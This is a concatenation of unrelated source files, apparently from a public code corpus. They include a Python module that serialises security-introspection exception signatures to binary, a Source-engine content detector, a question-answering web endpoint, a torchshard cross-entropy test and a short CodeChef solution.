packed_sigs += struct.pack("<I", int(sig & 0xFFFFFFFF))
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class Signature(IntroObject):
""" Represents an exception signature. For more details about it's implementation see it's
subclasses. """
def _cmp(self, other):
pass
def get_binary_header(self):
pass
def get_binary(self):
pass
class ExportSignature(Signature):
""" Represents an export signature. For more details about it's implementation see
`get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.library:
raise ValueError("library is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "export"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["library"] = get_binary_name(self.library, UserException, wide=True)
self.binary["hashes"] = []
for hl in self.hashes:
int_hash_list = []
int_hash_list.append(
{
"name": get_binary_name(hl["name"], Signature, wide=False),
"delta": int(hl["delta"]),
}
)
self.binary["hashes"].append(int_hash_list)
def __init__(self, sig_id, hashes, library, flags=None, **kwargs):
self.sig_id = sig_id
self.library = library
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), '%s' (%08x), %r" % (
self.sig_id,
self.binary["id"],
self.library,
self.binary["library"],
self.flags,
self.binary["flags"],
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 16
hashes_size = len(self.hashes) * 8
return struct.pack("<BH", 4, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
        - id[32]
        - flags[32]
        - library[32]
        - hash_list_count[8]
        - reserved[3 * 8]
        - hash-list-array[(16 + 16 + 32) * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
for helem in hash_list:
packed_hashes += struct.pack("<HHI", helem["delta"], 0, unsigned(helem["name"]))
return (
struct.pack(
"<IIIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.binary["library"]),
unsigned(len(self.binary["hashes"])),
0,
0,
0,
)
+ packed_hashes
)
class ValueSignature(Signature):
""" Represents a value signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.score == 0:
raise ValueError("score is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "value"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["hashes"] = []
for hlist in self.hashes:
int_hash_list = []
inj_hash = hlist
inj_hash["hash"] = int(hlist["hash"], 16)
int_hash_list.append(inj_hash)
self.binary["hashes"].append(int_hash_list)
def __init__(self, sig_id, hashes, score=0, flags=None, **kwargs):
self.sig_id = sig_id
self.score = score
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.score,
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 12
hashes_size = len(self.hashes) * 12
return struct.pack("<BH", 5, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
- id[32]
- flags[32]
- score[8]
- hash_list_count[8]
- hash-list-array[32 * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
for he in hash_list:
packed_hashes += struct.pack("<HHII", he["offset"], he["size"], 0, he["hash"])
return (
struct.pack(
"<IIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.score),
unsigned(len(self.binary["hashes"])),
0,
0,
)
+ packed_hashes
)
class CbSignature(Signature):
""" Represents a codeblocks signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.score == 0:
raise ValueError("score is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "codeblocks"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["hashes"] = []
for hl in self.hashes:
int_hash_list = []
for he in hl:
int_hash_list.append(int(he, 16))
int_hash_list.sort()
self.binary["hashes"].append(int_hash_list)
def __init__(self, sig_id, hashes, score=0, flags=None, **kwargs):
self.sig_id = sig_id
self.score = score
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.score,
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 10
hashes_size = 0
for hash_list in self.hashes:
hashes_size += len(hash_list) * 4
hashes_size += len(self.hashes)
return struct.pack("<BH", 3, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
- id[32]
- flags[32]
- score[8]
- hash_list_count[8]
- hash-list-array[32 * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
packed_hashes += struct.pack("B", len(hash_list))
for helem in hash_list:
packed_hashes += struct.pack("<I", helem)
return (
struct.pack(
"<IIBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.score),
unsigned(len(self.binary["hashes"])),
)
+ packed_hashes
)
class ValueCodeSignature(Signature):
""" Represents a value code extended(pattern) signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if not self.offset:
self.offset = 0
        if self.offset > 32767:
            raise ValueError("offset must be <= 32767 (MAX_INT16)")
        if self.offset < -32768:
            raise ValueError("offset must be >= -32768 (MIN_INT16)")
if not self.pattern:
raise ValueError("pattern is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "value-code"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["pattern"] = list()
for pattern_elem in self.pattern:
self.binary["pattern"].append(int(pattern_elem, 16))
def __init__(self, sig_id, pattern, offset, flags=None, **kwargs):
self.sig_id = sig_id
self.offset = offset
self.pattern = pattern
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.offset,
self.binary["pattern"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
        The format is as follows:
- type[8] = 8
- size[16] = 12 + pattern_items * sizeof_pattern_item """
struct_size = 12
pattern_size = len(self.pattern) * 2
print(pattern_size)
return struct.pack("<BH", 8, struct_size + pattern_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
- id[32]
- flags[32]
- offset[16]
- length[16]
- pattern-array[16 * pattern_items] """
packed_pattern = bytes()
for pattern_elem in self.binary["pattern"]:
packed_pattern += struct.pack("<H", pattern_elem)
return (
struct.pack(
"<IIhH",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
self.offset,
unsigned(len(self.binary["pattern"])),
)
+ packed_pattern
)
class IdtSignature(Signature):
""" Represents an idt signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.entry is None:
raise ValueError("entry is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "idt"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["entry"] = self.entry
def __init__(self, sig_id, entry, flags=None, **kwargs):
self.sig_id = sig_id
self.entry = entry
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, (%02d)" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.entry,
self.binary["entry"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 10
- size[16] = 10/12"""
struct_size = 12
return struct.pack("<BH", 10, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
        - id[32]
        - flags[32]
        - entry[8]
        - _reserved[3 * 8]
"""
return struct.pack(
"<IIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.entry),
0,
0,
0,
)
class VersionOsSignature(Signature):
""" Represents a version os signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
        if self.minimum is None:
            raise ValueError('minimum version is required!')
        if self.maximum is None:
            raise ValueError('maximum version is required!')
        if '.' in self.minimum and '.' not in self.maximum:
            raise ValueError('invalid os version format!')
        if '.' not in self.minimum and '.' in self.maximum:
            raise ValueError('invalid os version format!')
        if '.' in self.minimum and len(self.minimum.split('.')) != 3:
            raise ValueError('invalid os version format!')
        if '.' in self.maximum and len(self.maximum.split('.')) != 3:
            raise ValueError('invalid os version format!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
        self.binary['id'] = get_sig_id(self.sig_id, excfg.get("SignatureType", "version-os"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
if '.' in self.minimum:
values = list()
for item in self.minimum.split('.'):
if item == '*':
values.append(0)
else:
values.append(unsigned(int(item)))
self.binary["minimum"] = {"version" : values[0], "patch" : values[1], "sublevel" :
values[2]}
else:
if self.minimum == '*':
self.binary['minimum'] = {"value" : 0}
else:
self.binary['minimum'] = {"value" : unsigned(int(self.minimum))}
if '.' in self.maximum:
values = list()
for item in self.maximum.split('.'):
if item == '*':
values.append(0xffff)
else:
values.append(unsigned(int(item)))
self.binary["maximum"] = {"version" : values[0], "patch" : values[1], "sublevel" :
values[2]}
else:
if self.maximum == '*':
self.binary['maximum'] = {"value" : 0xffff}
else:
self.binary['maximum'] = {"value" : unsigned(int(self.maximum))}
def __init__(self, sig_id, minimum, maximum, flags=None, **kwargs):
self.sig_id = sig_id
self.minimum = minimum
self.maximum = maximum
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
if 'value' in self.binary['minimum']:
return "'%s' (%04d), '%s' (%04x), %s (0x%04x), '%s' (0x%04x)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'],
self.minimum, self.binary['minimum']['value'],
self.maximum, self.binary['maximum']['value'])
else:
return "'%s' (%04d), '%s' (%04x), '%s' (%d.%d.%d), '%s' (%d.%d.%d)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.minimum, self.binary['minimum']['version'],
self.binary['minimum']['patch'], self.binary['minimum']['sublevel'],
self.maximum, self.binary['maximum']['version'], self.binary['maximum']['patch'], self.binary['maximum']['sublevel'])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
        The format is as follows:
        - type[8] = 11
        - size[16] = 24 """
struct_size = 24
return struct.pack('<BH', 11, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
        - id[32]
        - flags[32]
        - minimum[64]
        - maximum[64]
"""
if 'value' in self.binary["minimum"]:
return struct.pack('<IIQQ',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['value']),
unsigned(self.binary['maximum']['value']))
else:
return struct.pack('<IIBBHHBBBBHHBB',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['version']),
unsigned(self.binary['minimum']['patch']),
unsigned(self.binary['minimum']['sublevel']),
0,
0,
0,
unsigned(self.binary['maximum']['version']),
unsigned(self.binary['maximum']['patch']),
unsigned(self.binary['maximum']['sublevel']),
0xffff,
0,
0)
class VersionIntroSignature(Signature):
""" Represents a version os signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
if self.minimum is None:
raise ValueError('minimum version is required!')
if '.' not in self.minimum:
raise ValueError('invalid intro version format!')
if len(self.minimum.split('.')) != 3:
raise ValueError('invalid intro version format!')
if self.maximum is None:
raise ValueError('maximum version is required!')
if '.' not in self.maximum:
raise ValueError('invalid intro version format!')
if len(self.maximum.split('.')) != 3:
raise ValueError('invalid intro version format!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
        self.binary['id'] = get_sig_id(self.sig_id, excfg.get("SignatureType", "version-intro"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
if '.' in self.minimum:
values = list()
for item in self.minimum.split('.'):
if item == '*':
values.append(0)
else:
values.append(unsigned(int(item)))
self.binary["minimum"] = {"major" : values[0], "minor" : values[1], "revision":
values[2]}
if '.' in self.maximum:
values = list()
for item in self.maximum.split('.'):
if item == '*':
values.append(0xffff)
else:
values.append(unsigned(int(item)))
self.binary["maximum"] = {"major" : values[0], "minor" : values[1], "revision":
values[2]}
def __init__(self, sig_id, minimum, maximum, flags=None, **kwargs):
self.sig_id = sig_id
self.minimum = minimum
self.maximum = maximum
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), '%s' (%d.%d.%d), '%s' (%d.%d.%d)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.minimum, self.binary['minimum']["major"], self.binary["minimum"]["minor"], self.binary["minimum"]["revision"],
self.maximum, self.binary['maximum']["major"], self.binary["maximum"]['minor'], self.binary["maximum"]["revision"])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
        The format is as follows:
        - type[8] = 12
        - size[16] = 24 """
struct_size = 24
return struct.pack('<BH', 12, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
        - id[32]
        - flags[32]
        - min[64]
        - max[64]
"""
return struct.pack('<IIHHHHHHHH',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['major']),
unsigned(self.binary['minimum']['minor']),
unsigned(self.binary['minimum']['revision']),
0x0,
unsigned(self.binary['maximum']['major']),
unsigned(self.binary['maximum']['minor']),
unsigned(self.binary['maximum']['revision']),
0xffff)
class ProcessCreationSignature(Signature):
""" Represents a process-creaation signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
if self.create_mask is None:
raise ValueError('create-mask is required!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary['id'] = get_sig_id(self.sig_id, excfg.get("SignatureType", "process-creation"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
self.binary['create-mask'] = 0
for flag in self.create_mask:
print(excfg.get("ProcessCreationFlags", flag))
self.binary['create-mask'] = self.binary['create-mask'] | int(excfg.get("ProcessCreationFlags", flag), 16)
def __init__(self, sig_id, create_mask, flags=None, **kwargs):
self.sig_id = sig_id
self.create_mask = create_mask
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
return "'%s' (%04d), '%s' (%08x), '%s' (0x%08x) " % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.create_mask, self.binary["create-mask"])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
        The format is as follows:
        - type[8] = 13
        - size[16] = 24 """
struct_size = 24
return struct.pack('<BH', 13, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
        The format is as follows:
        - id[32]
        - flags[32]
        - create-mask[32]
        - _reserved[3 * 32]
"""
return struct.pack('<IIIIII',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary["create-mask"]),
0,
0,
0)
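    # Sketch of the create-mask construction above (flag names and hex values are
    # assumptions; the real ones come from the "ProcessCreationFlags" section of
    # the exception config): each configured flag contributes its bit, so a rule
    # with two flags mapped to 0x1 and 0x4 yields create-mask 0x5.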
|
examples/lp_train/models/__init__.py
|
drcut/QPyTorch
| 172 |
118317
|
<gh_stars>100-1000
from .vgg import *
from .vgg_low import *
from .preresnet import *
from .preresnet_low import *
|
library/shared/content_providers/content_detectors/source1_common.py
|
REDxEYE/SourceIO
| 199 |
118335
|
<gh_stars>100-1000
from pathlib import Path
from typing import Dict, Type
from .source1_base import Source1DetectorBase
from ..content_provider_base import ContentDetectorBase, ContentProviderBase
from .....library.utils.path_utilities import backwalk_file_resolver
from ..source1_content_provider import GameinfoContentProvider
from ..non_source_sub_manager import NonSourceContentProvider
class Source1Common(Source1DetectorBase):
@classmethod
def add_if_exists(cls, path: Path, content_provider_class: Type[ContentProviderBase],
content_providers: Dict[str, ContentProviderBase]):
super().add_if_exists(path, content_provider_class, content_providers)
cls.scan_for_vpk(path, content_providers)
@classmethod
def scan(cls, path: Path) -> Dict[str, ContentProviderBase]:
game_root = None
is_source = backwalk_file_resolver(path, 'platform') and backwalk_file_resolver(path, 'bin')
if is_source:
game_root = (backwalk_file_resolver(path, 'platform') or backwalk_file_resolver(path, 'bin')).parent
if game_root is None:
return {}
content_providers = {}
for folder in game_root.iterdir():
if folder.stem in content_providers:
continue
elif (folder / 'gameinfo.txt').exists():
cls.recursive_traversal(game_root, folder.stem, content_providers)
cls.register_common(game_root, content_providers)
return content_providers
@classmethod
def register_common(cls, root_path: Path, content_providers: Dict[str, ContentProviderBase]):
cls.add_if_exists(root_path / 'platform', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'hl2', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'garrysmod', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'synergy', NonSourceContentProvider, content_providers)
|
cape_webservices/app/app_core.py
|
edwardmjackson/cape-webservices
| 164 |
118342
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import time
from cape_api_helpers.exceptions import UserException
from cape_api_helpers.input import required_parameter, optional_parameter, list_document_ids
from cape_api_helpers.output import list_response, debuggable
from cape_api_helpers.text_responses import *
from cape_responder.responder_core import Responder
from cape_webservices.webservices_settings import MAX_SIZE_INLINE_TEXT, \
HOSTNAME, CONFIG_SERVER, MAX_NUMBER_OF_ANSWERS
from cape_responder.task_manager import connect
from cape_webservices.app.app_middleware import respond_with_json, requires_token
from cape_webservices.app.app_settings import URL_BASE
from cape_webservices.app.app_settings import app_endpoints
from cape_userdb.base import DB
from cape_userdb.event import Event
from cape_userdb.coverage import Coverage
_endpoint_route = lambda x: app_endpoints.route(URL_BASE + x, methods=['GET', 'POST'])
def square(x):
return x ** 2
def neg(x):
return -x
def store_event(user_id, question, answers, question_source, answered, duration, automatic=False):
if DB.is_closed():
DB.connect()
event = Event(user_id=user_id, question=question, question_source=question_source, answers=answers,
answered=answered, duration=duration, automatic=automatic)
event.save()
total = Event.select().where(Event.user_id == user_id).count()
automatic = Event.select().where(Event.user_id == user_id, Event.automatic == True).count()
    # Baseline of 60% from MR plus the proportion answered by saved replies
coverage = 60 + (automatic / total) * 35
coverage_stat = Coverage(user_id=user_id, coverage=coverage)
coverage_stat.save()
DB.close()
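# Worked example of the coverage heuristic above: with 4 automatic answers out of
# 10 stored events, coverage = 60 + (4 / 10) * 35 = 74 percent.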
@_endpoint_route('/test')
@debuggable
@respond_with_json
def _test(request):
client = connect()
A = client.map(square, range(10))
B = client.map(neg, A)
total = client.submit(sum, B)
return {'worker': os.getpid(), "token": request["args"]["token"], 'result': total.result(),
'hostname': HOSTNAME, 'port': CONFIG_SERVER['port']}
@_endpoint_route('/answer')
@debuggable
@respond_with_json
@list_response
@list_document_ids
@requires_token
def _answer(request, number_of_items=1, offset=0, document_ids=None, max_number_of_answers=MAX_NUMBER_OF_ANSWERS):
start_time = time.time()
number_of_items = min(number_of_items, max(0, max_number_of_answers - offset))
user_token = required_parameter(request, 'token')
question = required_parameter(request, 'question')
source_type = optional_parameter(request, 'sourceType', 'all').lower()
text = optional_parameter(request, 'text', None)
speed_or_accuracy = optional_parameter(request, 'speedOrAccuracy', 'balanced').lower()
saved_reply_threshold = optional_parameter(request, 'threshold', request['user_from_token'].saved_reply_threshold)
document_threshold = optional_parameter(request, 'threshold', request['user_from_token'].document_threshold)
if source_type not in {'document', 'saved_reply', 'all'}:
raise UserException(ERROR_INVALID_SOURCE_TYPE)
if speed_or_accuracy not in {'speed', 'accuracy', 'balanced', 'total'}:
raise UserException(ERROR_INVALID_SPEED_OR_ACCURACY % speed_or_accuracy)
else:
if request['user_from_token'].plan == "pro":
speed_or_accuracy = "total"
if text is not None and len(text) > MAX_SIZE_INLINE_TEXT:
raise UserException(ERROR_MAX_SIZE_INLINE_TEXT % (MAX_SIZE_INLINE_TEXT, len(text)))
results = []
if source_type != 'document':
results.extend(Responder.get_answers_from_similar_questions(user_token, question, source_type, document_ids,
saved_reply_threshold))
results = sorted(results, key=lambda x: x['confidence'],
reverse=True)
if (source_type == 'document' or source_type == 'all') and len(results) < number_of_items:
results.extend(Responder.get_answers_from_documents(user_token,
question,
document_ids,
offset,
number_of_items - len(results),
text, document_threshold, speed_or_accuracy))
results = results[offset:offset + number_of_items]
automatic = False
if len(results) > 0:
automatic = results[0]['sourceType'] == 'saved_reply' or results[0]['sourceType'] == 'annotation'
duration = time.time() - start_time
connect().submit(store_event,
request['user_from_token'].user_id,
question,
results,
'API',
len(results) > 0,
duration,
automatic)
return {'items': results}
if __name__ == '__main__':
import sanic.response
# Create a fake request
class MyDict(dict):
pass
request = MyDict({
"args": {
# 'token': '<KEY>',
'token': 'testtoken_answer',
'question': 'Who is <NAME>a?',
'threshold': 'low',
'documentIds': '',
'sourcetype': 'document',
'speedoraccuracy': '',
'numberofitems': '1',
'offset': '0'
}
})
request.headers = {}
response: sanic.response.HTTPResponse = _answer(request)
response_dict = json.loads(response.body.decode('utf-8'))
for i, item in enumerate(response_dict['result']['items']):
print("{} | {} | {} | {}".format(i + 1, item['text'], item['sourceType'], item['confidence']))
|
pyabc/external/__init__.py
|
ICB-DCM/pyABC
| 144 |
118365
|
<filename>pyabc/external/__init__.py
"""
External simulators
===================
This module can be used to easily interface pyABC with model simulations,
summary statistics calculators and distance functions written in arbitrary
programming languages, only requiring a specified command line interface
and file input and output.
It has been successfully used with models written in e.g. R, Java, or C++.
"""
from .r_rpy2 import R
from .base import (
ExternalHandler,
ExternalModel,
ExternalSumStat,
ExternalDistance,
create_sum_stat)
|
Easy/Please like me (PLSLYKME)/PLEASE LIKE ME.py
|
sakayaparp/CodeChef
| 127 |
118379
|
N = int(input("Enter the number of test cases:"))
for _ in range(0, N):
    L, D, S, C = map(int, input().split())
    for day in range(1, D):
        if S >= L:
            break
        S += C * S
    if L <= S:
        print("ALIVE AND KICKING")
    else:
        print("DEAD AND ROTTING")
|
tests/test_cross_entropy.py
|
KaiyuYue/torchshard
| 265 |
118381
|
from typing import Optional, List, Callable, Tuple
import torch
import random
import sys
import torch.nn.functional as F
import torch.multiprocessing as mp
import torch.nn.parallel as parallel
import unittest
import torchshard as ts
from testing import IdentityLayer
from testing import dist_worker, assertEqual, set_seed
from testing import loss_reduction_type, threshold
def torch_cross_entropy(batch_size, seq_length, vocab_size, logits_scale, seed, local_rank):
set_seed(seed)
identity = IdentityLayer((batch_size, seq_length, vocab_size),
scale=logits_scale).cuda(local_rank)
logits = identity()
target = torch.LongTensor(
size=(batch_size, seq_length)).random_(0, vocab_size).cuda(local_rank)
logits = logits.view(-1, logits.size()[-1])
target = target.view(-1)
loss = F.cross_entropy(logits, target, reduction=loss_reduction_type).view_as(target)
if loss_reduction_type == 'none':
loss = loss.sum()
loss.backward()
return loss, identity.weight.grad, logits, target
def torchshard_cross_entropy(batch_size, seq_length, vocab_size, logits_scale, seed, local_rank):
set_seed(seed)
identity = IdentityLayer((batch_size, seq_length, vocab_size),
scale=logits_scale).cuda(local_rank)
logits = identity()
target = torch.LongTensor(
size=(batch_size, seq_length)).random_(0, vocab_size).cuda(local_rank)
logits = logits.view(-1, logits.size()[-1])
target = target.view(-1)
logits_parallel = ts.distributed.scatter(logits, dim=-1)
loss = ts.nn.functional.parallel_cross_entropy(logits_parallel, target, reduction=loss_reduction_type)
if loss_reduction_type == 'none':
loss = loss.sum()
loss.backward()
return loss, identity.weight.grad, logits, target
class TestCrossEntropy(unittest.TestCase):
@staticmethod
def run_test_naive_cross_entropy(local_rank: int) -> None:
# settings
batch_size = 13
seq_length = 17
vocab_size_per_partition = 11
logits_scale = 1000.0
tensor_model_parallel_size = ts.distributed.get_world_size()
vocab_size = vocab_size_per_partition * tensor_model_parallel_size
seed = 1234
loss_torch, grad_torch, logits_torch, target_torch = \
torch_cross_entropy(batch_size, seq_length,
vocab_size, logits_scale,
seed, local_rank)
loss_ts, grad_ts, logits_ts, target_ts = \
torchshard_cross_entropy(batch_size, seq_length,
vocab_size, logits_scale,
seed, local_rank)
assertEqual(logits_torch, logits_ts, threshold=threshold)
assertEqual(target_torch, target_ts, threshold=threshold)
assertEqual(loss_torch, loss_ts, threshold=threshold)
assertEqual(grad_torch, grad_ts, threshold=threshold)
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA is not available')
def test_naive_cross_entropy(self):
ngpus = torch.cuda.device_count()
mp.spawn(
dist_worker,
args=(self.run_test_naive_cross_entropy, ngpus),
nprocs=ngpus
)
ts.distributed.destroy_process_group()
if __name__ == '__main__':
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
unittest.main()
|
armi/materials/magnesium.py
|
celikten/armi
| 162 |
118383
|
<filename>armi/materials/magnesium.py
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
